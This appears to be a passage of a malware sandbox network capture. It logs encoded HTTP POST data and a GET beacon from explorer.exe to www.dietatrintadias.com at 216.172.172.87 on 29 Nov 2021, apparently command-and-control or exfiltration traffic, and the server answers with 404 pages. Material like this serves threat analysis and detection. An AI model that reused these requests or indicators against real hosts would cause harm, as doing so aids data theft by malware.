76 78 64 44 7a 53 6e 7a 43 54 4d 75 6f 74 7e 44 6f 34 67 52 45 72 7e 42 47 37 4d 59 79 6f 53 68 69 68 57 68 4b 69 46 45 63 6d 56 62 54 47 59 54 36 59 4f 74 52 67 48 31 51 50 38 55 50 7a 62 78 61 48 6c 62 65 39 73 7a 67 4b 33 76 57 41 52 68 76 66 53 72 36 4f 4c 36 6b 42 4e 71 55 70 55 6b 78 32 6f 62 48 35
                                                                                                                                                    Data Ascii: lZOD=4V18NrflVZI_spouH2fC6rBzW4LRTVvu0WtpjxMSygH1Na~b9pWwGwvtV5w1f-wUMutxkPewP4DwsZZKTou_37KDI5u1mEApVOd4SxRk~e20sS9k0YUhyz5TyfWmoaroroFG917Ip4D13aUFQElZ9ueJRGBmYUZ5j8T4~PXMTKpNGQTpz6BR7dTx6RbE(-GLb_3ft0gpCNxRLXQ-WUrJG0stv8L2DV5Y8Zf-xARIZI6nIzUzFBNurQgRhshqCCLVFaU9VJekX_7e7V2iyrKSnh1boWF5WztiTWCdOAKoBeKWwh(SrhBp1DnMQpbHDcMncZQDIi68vdAnGKnyPF9wA0f8bh7cReFDhDiwZsnSAYy9J_BQxtddTvSn0yevWt18Ns7CbiWFeniS8leJyAGZ07oZ3_D5SpwOD2uRLdUweCLY91~O6momTsE5ZKNaOFlmANhIsSLsH-WmPk4z7MUJeanNZn~DDOt-1axgTkLNYQR2xPoC791kEtSUNlyW3MOd~fVK0HMSgIHA2fdfDEo-5Xxo~taJ1vVNcs87tqq7BZRAjGYD46LFKzRjMjrQKsMgbDZ52vTizTsKAlmT4TGOpAUZzSTXnWsRWnKCaZG0dH7PCyTNNG8qqgTMZSoN28QPGPkal6874iKJ64CxI4fP9D1o8evV(vvsagw1ojmHB45td9ahzaJba876byVvBzxHR5YUkAH3~b5v(fjlDmOuMTJEpUgNgDl5Eni5VFy7oZbZBU(v6D6BIclcHgosC4rxdlk0a2nJZBS1bT9l5s0UBvT8LWNGCJriVtIxGwXuJBQQxyG7xVlrJ8pAfv3FzagI4PruJY8illVVN6dmewxaDO6ouZs-97u2XPKlqohIr4J0msjPlYIOWWGm0cubmeoA~BUcFDPbDdaPc5LVl8Jn0w8d8_6WVF79Vh3vB_yH5BaRsYgxtWMIHz~E7RMIT-2hBVUYdxxat9LCM9EpAh1iL-MJHPi9ly566Rskwy1fB_tzS_lBlb8MWLRnYIQ6ppgYa7Naep0WTuPDVLAXFga1Yy4eyYgVeiy0XogiWomKemi9Z2BhPe0Qd_0D1lrmZPy00NcH9MmYE1dx(AoV1QtKRbh7vVW4(epYAj0aenBI1BK45NzE(BWo3Pm7GFbvB4r_dq97JqTxFNLSSvt0wIqer9ayqZlkOIR77wpvP_UJ0q99o4Zk~RygFjQ8uUQkmdHs73(p8ogywd1gOPWHL2Wmef86ogtmzs38MgpezImavxdDzSnzCTMuot~Do4gREr~BG7MYyoShihWhKiFEcmVbTGYT6YOtRgH1QP8UPzbxaHlbe9szgK3vWARhvfSr6OL6kBNqUpUkx2obH5yD0D7z2zUCJunWqjVU18UKXbtBF7PCrT6l9pUNFsB9cH0GzvkDEZp6IRiEtDioI5diSdsvd2Of668elerMPNGy7yE0HTfrzGEtBNgF12xDpR~Uk5rAUSX0v1hauLzMJO1eXrb19sEc9bCv5mnJO2AslFkrg3e-aV39wAaTIVfroHP1tLbWbevYklXzda3TY7eYhsChs-TQfvSSooL_GavBtARmh_Y2fJZnydE4leYG2xcAtcAv84ALu3M95zQA1DB9i1mLAa(URjJztgzM7L(L3zoRHnOihwahqcIwA99kD4iKYalvNEc6SjESPd1xhXgBeToBHov4qB1VFYNM3fOmbgEmYZBdg8h_JqDdboYFwPNK1gjJW3SZkVvJI5aXaB~Dq3pjLrlxxlyqN1hxO3ir8tDkb4zCKIDhF5EO9BXch-TJB5s5X9B3wobYbyGVy3uso9HLb10kux7-elB2EU5Nbxhu4_G8EVHWI1Hcggf-9Eb87u17uR3TLRknCDMmn0akvplZus0VhdT1Lb0k241PVtZgZlSHGP8WVEQyGODZES6S6Am9NQbW9scyy3Ai5UeHZgN3McictIgfjGzLDFhmgZJFizSKSFG4M5mSJkrQsbc8HQGCHWQtzJgRBROMjdO-kLnfikOUcwbhAgn02qx_FTve(LPep7go~dmAS2Jjt0XRFv5j3UggJa5aRXz7arMKBt~uaJjyPfFU3Pue0pyyMrXSMlllW74iTgWmAopggvT7Lh5bbsRzcdxHxSFjM2aQNFfgh2LSo1j39onedCEfQKBJWSA72zMrznjgZ3uSyScM4TVd7QJT2bSoLAEIpQaErLjTA9KIZZX2qr4-p7fF6MNzKokZM3ZF5q1k4XxvvCxBlb4KbRYACjtb2GaALUW9LIiGpHfodOypQ0eQ6C(WBdhX9u9S2QY97kvZad5dNkk_vR9JsVVW5HIL~_vMs4uKlI3wM8vpRa4pvDkIcdq2L8Kk6-7SU0WzbVdgMLLlYhDqyVpM396GJ9vhtrBNE7SjsPCZJJpDMzvvxV86eK(5443YmmzxFwi3~tq_ML1QnWigROgSBNtFx1ivEF2XCHUd0E6iNZxtWeINlflqCVdQsSWi~7Ulv5GUAIgcftE_vaTsMj6PCgFH~XeC(7GeVAZFdWfI(7en9MldXiwBEI4RWBLpT2jyrm2DrdyoaFxlQ8oXCW65pjvf3UOaWyXK(IZ_GiSq5Uzn(nu2kwg0DmJ8p79h8LqX~qdFrbHKa4RZt7CkV4y3QuSlQ8VTdY44d9ToA0eBcto4CF6c9hhCO5W9suuU0E12ckMqI7T5HfFu7J9UqEjBcA8NHLQgd9Cl8FbIfIKzP_28S1Xa5ak_taU0eGhW5N8LudMQm_4E8IBF~w8ytu43bShVGA(DFMW_f74kE1A6BPIBci3ZFvKVlfFNk4lFcJRDWVoh8AeCzLrk2fv0OITZvTxmSg8HkSL6mfH7wWDjb_P2Ak(EBM0IXTl9w74SXTC7Q4E4P_dPxn8E~BVEz1xOMNLQUM8yWE1IFOyfJv9lLTMQJu4yGFTM8ubFDdt28_1XzBZsK9zWuYo2DxmG3wxrkfh7THEhqAp5wRWS00YKK3mq6EiKpZMHDxokwd00dCkgMyJTIElqGU2gWe2w~JA0~p1t97pMQF75whWNr6ZCbcFGl4oI3HtTz_X6UAq0DamHbVteIzKxDysHho8KRNcME_zUY2oua8qS2-PPJpa-noz8El~_ZzTVuLKa8y53pfE5ezjZZ-7evzqhG0PJs7mJkMp0QQJG34uq64NmIdFGJum8k0kIUtqYqzsgoKISnj4YPNQcDmYRTRdDh6wH8639dk1dA7PcHatIH8AGNHgynxLbsKGwX-~xrDPLbloEYfdK(lTF1SHQrkIpRfI81URgU7xVXutrPvl4E0WHfIgRieXeZqr6Ioz_yK2INKuFgjVUky3ST3PIY-Sx(TDUHvxFdUiNugpB0PG1QVfhAmEXTS70l5VQo0apfqTl4ic1J8xhQB3BVcJ7Tll0~an47glalmqEUAM_eAFSQQGAAQxV9nfmYW9nQIST8Q(0gfVVeA9k48IJxD7N8uNp8fRyML52t696yplSH3h8r6zXlLHcSFjhkw0DdhYi6iQXaFRaKj3yTNASy6nzSdiCoJG6L7A24PQkMeQemsQ3yj81UewIgrZLBjXbfBmdE4tJDfj-rmTbYkl-JkSRcPtr41(9Ef2X9L0ErafsWkoTye53LQi8t_me4-m4R-LJoojRIzaySfTs5m~DQ1Q3KdjZ~1wQkthSxvBmmzieMhYeIVz1rfADEsyF0FLUooAeXflvYKSLHpGdZu0Azn~9gKNnnZBzLDal1mROYYmXkKxVeHEM7MIiK6~PS6YL3GTSNFQIdTGD(WCGPQlcOOl21x58y7pbSHpbpAjkXbz-8FvHj0cpdn8BVFpS25tKjESRm-YOlV7eW_tv8y8h~pYYzpKYTj4U0JoW7LN5ui8MdP5LQpTtpJ4XKZLwz2mDEKCaXXia2GvYsPDA9tOp9XaaO8H0mI7YootOlSqVn3qusmOgu2DC2apRmenWkmk7E6YUvHSKQTdzSf3gBrlEl2F9Ny0oU6XPFizX9kshjjo5l1g_pVmfz_WdseYp1tUijZCGKluc3mdZTwZ-5S(ClyovWXJ0zi7sSlyO~rG98e4mlPwmPwXF0SejYAYYh3v9gaW-uTm1BPUKityarU2Bg
                                                                                                                                                    Nov 29, 2021 14:11:16.895016909 CET7653OUTData Raw: 67 33 33 58 56 64 4e 46 39 44 35 5a 6b 57 78 68 4b 39 5f 49 49 44 4a 38 32 34 76 6b 4e 47 68 67 4b 52 6c 39 4d 4a 67 36 38 71 44 7e 64 6c 45 78 4b 79 49 75 6e 71 62 4f 51 50 44 56 56 32 32 7a 75 7e 62 43 2d 77 73 78 57 38 65 6b 42 6e 69 69 37 42
                                                                                                                                                    Data Ascii: g33XVdNF9D5ZkWxhK9_IIDJ824vkNGhgKRl9MJg68qD~dlExKyIunqbOQPDVV22zu~bC-wsxW8ekBnii7BStQu-zRYzDVUN2wBZglCadB2yKkvPIGZMXon1tkIkoPeMIXUddX9rIXy-zZUpyBltOkGjU40C~-EGLGiEkmFhJkhBcCxB86uA9UBtscxFMH2p9Ntm2A(dy7(3mmXybSWNJgAcLYtnd_RmdVRiIsE_8KdVDMAuu60T
                                                                                                                                                    Nov 29, 2021 14:11:17.038265944 CET7663OUTData Raw: 43 46 79 30 67 6d 68 76 43 35 49 31 55 70 78 50 53 54 6c 44 71 63 33 73 72 4b 55 52 39 6f 4a 57 75 4b 4c 70 74 4c 68 33 75 6e 6e 4a 72 4f 65 6c 45 4f 4f 51 4a 4b 64 68 6f 79 6b 74 5f 69 37 63 4e 79 73 31 4e 68 31 30 5a 56 41 38 59 32 75 57 68 31
                                                                                                                                                    Data Ascii: CFy0gmhvC5I1UpxPSTlDqc3srKUR9oJWuKLptLh3unnJrOelEOOQJKdhoykt_i7cNys1Nh10ZVA8Y2uWh1gZpAQ1D~yEzNc6pMmaq8PxPoHROE2pe(OoaYHgoCIDxQwkZ~estybaG2IwADVCO8GCBBfEzDCoMBE4Xin4TE9V1CHn2rLtd2Ya0aTQ9ccDIXcI5hF1fuebCjgjVTgmLSiQrC7T7Aic8I02Sniyhu0q7ECvtynWAOT
                                                                                                                                                    Nov 29, 2021 14:11:17.038408995 CET7664OUTData Raw: 62 64 65 38 57 6c 33 6e 46 4a 53 72 4d 34 31 66 6c 35 57 73 71 34 66 31 61 79 69 48 74 47 5f 4b 57 6c 39 39 6b 6a 4e 64 34 51 41 36 6b 46 4a 71 44 6c 79 6f 6f 6e 69 52 49 59 68 77 4d 38 33 4a 45 51 2d 34 64 72 6f 73 48 63 67 72 45 50 55 4b 30 37
                                                                                                                                                    Data Ascii: bde8Wl3nFJSrM41fl5Wsq4f1ayiHtG_KWl99kjNd4QA6kFJqDlyooniRIYhwM83JEQ-4drosHcgrEPUK076G26-i3lo45Y9YLwRpH5v2GOi0PuDkDWaTUVYmr50DoHcBPKed88wu4MV2j9TI5AGZ2bsqQQMpkMPaUk2z_cW8aFeAng1sEL1AMZIW0CLLNmioNolE-0Px-XBWLjb4OVy6pXjJOtsph53vuzv7u(2J9kRliqsUY3I
                                                                                                                                                    Nov 29, 2021 14:11:17.042115927 CET7680OUTData Raw: 55 4d 32 53 30 7e 34 38 75 71 30 41 70 4a 78 65 35 4c 69 36 66 74 36 51 6a 44 42 54 45 56 58 35 2d 62 53 49 35 78 69 6b 44 54 62 52 74 28 78 47 77 61 44 4c 37 59 37 66 77 56 74 6a 6b 79 46 69 4d 45 5a 45 34 35 72 7a 73 6e 79 70 75 4e 43 55 6c 59
                                                                                                                                                    Data Ascii: UM2S0~48uq0ApJxe5Li6ft6QjDBTEVX5-bSI5xikDTbRt(xGwaDL7Y7fwVtjkyFiMEZE45rzsnypuNCUlYnZ1x-5veKgr~5JRfCVxiuI823HX(tS7E245Zl001HYKO6xZfMXTmS7XQQQ8btAToepNWxuyza8PS4wY9YOTVneVqBz_UvgYzZPkUwFpR9xM8_LY9oT22e8NIfzlyS3wf0Q-kLeisxKWWuWC3n29~x8YvObMG2dNP9
                                                                                                                                                    Nov 29, 2021 14:11:17.180354118 CET7683OUTData Raw: 6f 65 38 75 67 66 44 52 77 43 31 38 65 41 41 7e 34 64 6f 39 58 76 6a 36 76 7a 69 74 7a 76 62 4a 6a 52 5f 35 54 38 45 54 37 53 76 73 2d 6c 34 35 42 39 36 43 70 76 38 32 52 63 63 6c 32 6b 32 31 79 65 56 56 32 56 54 77 4e 55 44 35 6a 45 38 58 4a 4a
                                                                                                                                                    Data Ascii: oe8ugfDRwC18eAA~4do9Xvj6vzitzvbJjR_5T8ET7Svs-l45B96Cpv82Rccl2k21yeVV2VTwNUD5jE8XJJM5m0aqn2fVcGzV7ZCPrh7hnZjQdTOFB~GrflbF5JDPb9LL_C1phosRxcqnscqhrY-Pr0QfDKZxMnqPRLrm4ghDCi5hjsxF5NF~zsQZjhFrWcRCrM8gPkztzv7CahTqQLKYufMBNNKD7BrvuQDEYEuPDYU0LLY2Qij
                                                                                                                                                    Nov 29, 2021 14:11:17.180480957 CET7696OUTData Raw: 68 6a 50 52 65 54 39 45 55 46 39 48 76 45 67 77 54 48 5a 39 6d 4c 54 32 44 65 78 75 56 44 6d 56 50 68 69 48 51 7e 56 34 32 33 5a 72 68 79 70 50 54 47 56 62 48 47 44 4b 4f 56 48 75 4e 4d 5f 73 4c 4d 6a 54 36 50 69 70 70 46 47 69 4d 6a 4d 65 69 36
                                                                                                                                                    Data Ascii: hjPReT9EUF9HvEgwTHZ9mLT2DexuVDmVPhiHQ~V423ZrhypPTGVbHGDKOVHuNM_sLMjT6PippFGiMjMei6MjoRKrkhSz0DtjrXgBOmTDxr2LQEQ3FO67Ru8(GeyUfKqmlLwUALt0Hkq4O0B4MfuTrMB0jY-inh6K2eQ5NjDJT33O2(fXswvR-6pyhvH931RleWMUkaBSq6srrvIIhVaZHwzwnso9VECtAfafwYZqA(SvpLUmfcr
                                                                                                                                                    Nov 29, 2021 14:11:17.180556059 CET7701OUTData Raw: 62 6d 59 66 54 73 73 6d 54 6a 36 61 41 75 4e 55 34 46 57 71 32 46 38 33 65 4c 2d 66 52 51 39 51 55 74 6a 71 4f 43 48 72 6a 70 47 55 6b 4b 51 28 68 4e 30 76 67 70 56 5a 50 68 73 4f 30 38 69 59 6f 4f 61 52 49 56 43 78 6b 48 4e 55 6d 54 41 6e 4e 4f
                                                                                                                                                    Data Ascii: bmYfTssmTj6aAuNU4FWq2F83eL-fRQ9QUtjqOCHrjpGUkKQ(hN0vgpVZPhsO08iYoOaRIVCxkHNUmTAnNOVGRiIA4cyAhwbCgCkUxMemO3r~KutMxkbK-E9jMzcE3eO~c(n1GyrEZuu4ju2GvNPL41J2zCLnoWm1YmjO_sB6Cths0pKv6IEIQ4a8h9jdGKJCU5zCh8BNQT0LIsaaSqcUA1-ti64Iz3r2cit6wCersWqZyWCR0x7
                                                                                                                                                    Nov 29, 2021 14:11:17.180915117 CET7705OUTData Raw: 6e 6e 6f 36 32 44 4f 51 6f 70 53 6c 6e 28 66 34 41 4c 37 4c 6c 62 47 47 35 41 76 4a 47 6c 31 72 41 53 4a 57 38 52 58 7a 52 66 34 70 54 79 30 72 32 49 6f 76 62 7a 71 7a 51 6f 4b 70 47 75 6d 51 37 6c 48 4c 7a 34 70 74 34 28 37 7a 5a 49 32 4c 4c 6e
                                                                                                                                                    Data Ascii: nno62DOQopSln(f4AL7LlbGG5AvJGl1rASJW8RXzRf4pTy0r2IovbzqzQoKpGumQ7lHLz4pt4(7zZI2LLnCp5dGBtl05B4m4Wt_uMsq6ZOMhOQM(1(cLvyaOf9Q4wTmOeqsEMhOuyR-O7So8kV3uHLQJ2ZQuup7W7picI0QMQ7iT531UJKhFSL8AO2jnZEGb1xW1tc4UgBezCpsPffhdh6IK6kUyWom5PaOMarMCYNb9-kwZ3SK
                                                                                                                                                    Nov 29, 2021 14:11:17.181092024 CET7715OUTData Raw: 49 58 48 55 6f 34 45 4b 42 5a 33 6b 66 6d 6c 37 49 4e 42 69 63 38 6a 36 69 45 4d 6a 6f 4c 5a 43 79 65 32 79 74 4b 70 50 43 4d 69 4c 68 6a 36 62 62 58 33 4e 4f 51 48 44 68 59 78 42 38 56 58 76 55 33 68 4e 55 6d 66 52 74 6c 63 45 55 6a 48 74 71 30
                                                                                                                                                    Data Ascii: IXHUo4EKBZ3kfml7INBic8j6iEMjoLZCye2ytKpPCMiLhj6bbX3NOQHDhYxB8VXvU3hNUmfRtlcEUjHtq0l8m~opsY5rOCxKGnozUde(BMJp4B4lvzf6KQe~rtfD0ngcV5yW4K2x0Vo22hiklwwb6eQ5QfNRNg6r5qtB65Rjq892TYCctIj7APq6EwZdQ1ykRx4iPo6c0zvDX9jNzHjN707B1M1H7wzmbrqv_ZjAXgbVmwMcHfD
                                                                                                                                                    Nov 29, 2021 14:11:17.181330919 CET7728OUTData Raw: 6c 42 42 42 6e 38 46 66 73 51 37 41 61 34 4d 4d 62 55 73 6e 43 34 50 37 69 51 32 7e 45 55 73 56 6c 46 41 75 30 52 41 45 51 31 7a 5a 5a 46 73 46 6a 28 46 38 4d 75 51 4f 71 4c 43 68 68 30 43 59 4e 30 66 67 36 7e 62 37 50 4b 32 47 37 47 41 44 57 6f
                                                                                                                                                    Data Ascii: lBBBn8FfsQ7Aa4MMbUsnC4P7iQ2~EUsVlFAu0RAEQ1zZZFsFj(F8MuQOqLChh0CYN0fg6~b7PK2G7GADWo5hOTblpVgRIl2VElUDkeRWkxNnhBaqg09vv5nYuKTSDnk8Jvln5x0a8MdJ5u_cBXzPDOSk7RpGFJ7SZRkn2gF8r49WIMcHfWDwWFJjiApQRqSr6G3JJHkNrZm5_zo(ePblF(UadEkvdez9LnM2WnEzbwo7oXpy8tb
                                                                                                                                                    Nov 29, 2021 14:11:17.467701912 CET7776INHTTP/1.1 404 Not Found
                                                                                                                                                    Date: Mon, 29 Nov 2021 13:11:16 GMT
                                                                                                                                                    Server: Apache
                                                                                                                                                    Upgrade: h2,h2c
                                                                                                                                                    Connection: Upgrade, close
                                                                                                                                                    Last-Modified: Tue, 23 Jul 2019 14:50:08 GMT
                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                    Content-Encoding: gzip
                                                                                                                                                    Content-Length: 836
                                                                                                                                                    Content-Type: text/html
                                                                                                                                                    Data Raw: 1f 8b 08 00 00 00 00 00 00 03 ad 92 cd 6e db 46 10 c7 ef 05 f2 0e 1b 9e bd a2 65 45 1f 2e 48 01 a9 e3 3a bd 24 41 9b 00 ed a9 58 2d 47 e4 a0 bb 3b cc ee 90 92 fb 36 46 0e 05 0a f4 29 f4 62 5d da b2 4d 2a 4e 0b c7 39 50 9a e1 cc fc 66 fe 9c c9 9e bf 7a 7b f6 fe b7 77 e7 a2 62 6b 96 cf be cb ba 7f 61 94 2b f3 a4 66 f9 c3 cf 49 7c 29 44 56 81 2a ae ad 68 5b 60 25 74 a5 7c 00 ce 93 0f ef 7f 94 8b 64 10 ab 98 6b 09 1f 1b 6c f3 e4 57 f9 e1 a5 3c 23 5b 2b c6 95 81 44 68 72 0c 2e 16 fe 74 9e 43 51 c2 b0 d4 29 0b 79 d2 22 6c 6a f2 dc cb de 60 c1 55 5e 40 8b 1a e4 b5 73 24 d0 21 a3 32 32 68 65 20 1f 3f 44 5a 93 b7 8a 65 01 0c 9a 91 5c 8f c8 60 a0 ae c8 41 ee e8 a1 52 4f 2b e2 d0 2b 70 84 ae 80 ed 5d 2e 23 1b 58 be a6 50 43 a1 4a b0 a2 00 f1 0b 32 c4 0a 2b 5e 91 dd fd e3 90 c4 85 df 5d 31 06 21 45 cc e4 0b c5 e4 b3 f4 a6 74 cf 31 e8 fe 10 1e 4c 9e 84 2a 8a d6 0d 0b d4 dd a8 95 87 75 9e a4 ba 44 19 2e 43 8a 36 76 09 e9 5a b5 5d f8 ce 18 c5 9f e4 73 d6 63 10 72 72 32 aa 5d 99 88 80 7f 42 c8 93 c9 c9 76 72 f2 54 e6 74 3e 60 4e e7 db e9 fc a9 cc f9 6c c0 9c cf b6 f3 d9 53 99 a7 43 e6 e9 6c 7b fa 64 e6 f8 64 31 80 46 7f 1b 9f 07 b0 5f b5 72 39 3e 1d 2e 2c fa db f8 3c c0 57 75 6d 40 32 35 ba 92 8f 94 70 7c 20 e1 38 4a 38 fe a6 2d a6 07 2a a6 51 c5 f4 db aa 58 1c a8 58 44 15 8b 03 15 07 2c 1d 42 ba 22 e2 c0 5e d5 23 8b 6e 14 df 24 fb 75 f1 a5 81 50 01 f0 ff 22 d6 e4 38 7c 5d a9 6e 02 93 fd fd c5 f1 8b ff a8 cf d2 0a 54 71 63 ae a8 b8 bc 85 16 d8 0a 6d 54 88 6a e3 17 60 85 0e bc 08 b5 d2 70 db 77 98 e4 69 73 1f 38 ac 37 72 1b e2 29 88 ce 0a 56 4e fb 99 31 b7 9a 2c cf bd 27 11 27 8d e3 4c 0e 82 e3 65 16 bf 21 b9 72 f9 b6 0e 47 59 ba 77 b2 95 5f be d9 7d 22 01 ae 1b d0 2b 4b a1 7b 07 21 28 51 ef ae 4a 74 ea 79 c4 8d 87 b8 7a f9 4e 79 d0 20 3e 36 20 ee 12 af bd 96 f4 ee 6f 01 81 77 57 a2 f6 a4 1b af 5c 41 62 4d 28 2c b5 58 28 41 8d 70 8d d3 4a c0 16 03 63 73 24 34 78 c6 35 c6 72 19 6e 98 05 96 18 4f 4c 74 83 15 e0 61 f7 17 45 dd de 03 2b 0b 8e a1 83 04 28 1b 6c 44 63 c5 f5 ee da dd 95 c1 82 46 59 5a 0f 87 55 fb b5 56 cc 75 f8 3e 4d 37 9b cd a8 a2 c0 a5 62 f2 23 4d 76 b4 f2 89 60 64 03 79 f2 3a 06 2e ba 40 b2 3c 23 57 c5 c6 4a 3a 0a f1 1b a8 21 b5 b7 1a 43 25 0d 97 11 e3 68 4b 11 bc ee 5d 13 5a 55 42 48 bb 6c 79 df 3f b4 65 22 94 e1 41 eb 41 a7 34 b6 ea 1f c5 a1 df 9b a4 c2 a2 00 17 ef e4 f6 48 c6 c9 f2 51 f9 b3 83 de 5f 54 81 c6 34 f1 86 14 23 39 19 4f ee 46 c7 67 d8 58 2f 3d 84 9a 5c c0 16 c4 5e 69 bf 38 f9 a2 b4 be 77 6f 67 e9 8a 8a cb 68 c6 ab 64 6b a2 f1 2f 66 df cc 8d 39 09 00 00
                                                                                                                                                    Data Ascii: nFeE.H:$AX-G;6F)b]M*N9Pfz{wbka+fI|)DV*h[`%t|dklW<#[+Dhr.tCQ)y"lj`U^@s$!22he ?DZe\`ARO++p].#XPCJ2+^]1!Et1L*uD.C6vZ]scrr2]BvrTt>`NlSCl{dd1F_r9>.,<Wum@25p| 8J8-*QXXD,B"^#n$uP"8|]nTqcmTj`pwis87r)VN1,''Le!rGYw_}"+K{!(QJtyzNy >6 owW\AbM(,X(ApJcs$4x5rnOLtaE+(lDcFYZUVu>M7b#Mv`dy:.@<#WJ:!C%hK]ZUBHly?e"AA4HQ_T4#9OFgX/=\^i8woghdk/f9


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    33192.168.11.2049847216.172.172.8780C:\Windows\explorer.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    Nov 29, 2021 14:11:17.042098045 CET7664OUTGET /n8ds/?lZOD=3XBGTKX1IO0m2ps0OCefiLpUWq3mTk3XjxcX7A828ivUAOqw78DSKkuwDvhVWOojGfRi&3fVD2v=9rZXD0c8pBS HTTP/1.1
                                                                                                                                                    Host: www.dietatrintadias.com
                                                                                                                                                    Connection: close
                                                                                                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                    Data Ascii:
                                                                                                                                                    Nov 29, 2021 14:11:17.251446009 CET7733INHTTP/1.1 404 Not Found
                                                                                                                                                    Date: Mon, 29 Nov 2021 13:11:17 GMT
                                                                                                                                                    Server: Apache
                                                                                                                                                    Upgrade: h2,h2c
                                                                                                                                                    Connection: Upgrade, close
                                                                                                                                                    Last-Modified: Tue, 23 Jul 2019 14:50:08 GMT
                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                    Content-Length: 2361
                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                    Content-Type: text/html
                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 70 74 2d 42 52 22 3e 0d 0a 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 66 6f 72 6d 61 74 2d 64 65 74 65 63 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 6c 65 70 68 6f 6e 65 3d 6e 6f 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 48 6f 73 70 65 64 61 67 65 6d 20 64 65 20 53 69 74 65 20 63 6f 6d 20 44 6f 6d c3 ad 6e 69 6f 20 47 72 c3 a1 74 69 73 20 2d 20 48 6f 73 74 47 61 74 6f 72 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 63 67 69 2d 73 79 73 2f 69 6d 61 67 65 73 2f 66 61 76 69 63 6f 6e 73 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 63 67 69 2d 73 79 73 2f 69 6d 61 67 65 73 2f 66 61 76 69 63 6f 6e 73 2f 66 61 76 69 63 6f 6e 2d 33 32 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 33 32 78 33 32 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 63 67 69 2d 73 79 73 2f 69 6d 61 67 65 73 2f 66 61 76 69 63 6f 6e 73 2f 66 61 76 69 63 6f 6e 2d 35 37 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 35 37 78 35 37 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 63 67 69 2d 73 79 73 2f 69 6d 61 67 65 73 2f 66 61 76 69 63 6f 6e 73 2f 66 61 76 69 63 6f 6e 2d 37 36 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 37 36 78 37 36 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 63 67 69 2d 73 79 73 2f 69 6d 61 67 65 73 2f 66 61 76 69 63 6f 6e 73 2f 66 61 76 69 63 6f 6e 2d 39 36 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 39 36 78 39 36 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 63 67 69 2d 73 79 73 2f 69 6d 61 67 65 73 2f 66 61 76 69 63 6f 6e 73 2f 66 61 76 69 63 6f 6e 2d 31 32 38 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 31 32 38 78 31 32 38 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 63 67 69 2d 73 79 73 2f 69 6d 61 67 65 73 2f 66 61 76 69 63 6f 6e 73 2f 66 61 76 69 63 6f 6e 2d 31 39 32 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 31 39 32 78 31 39 32 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 63 67 69 2d 73 79 73 2f 69 6d 61 67 65 73 2f 66 61 76 69 63 6f 6e 73 2f 66 61 76 69 63 6f 6e 2d 31 32 30 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 31 32 30 78 31 32 30 22 3e
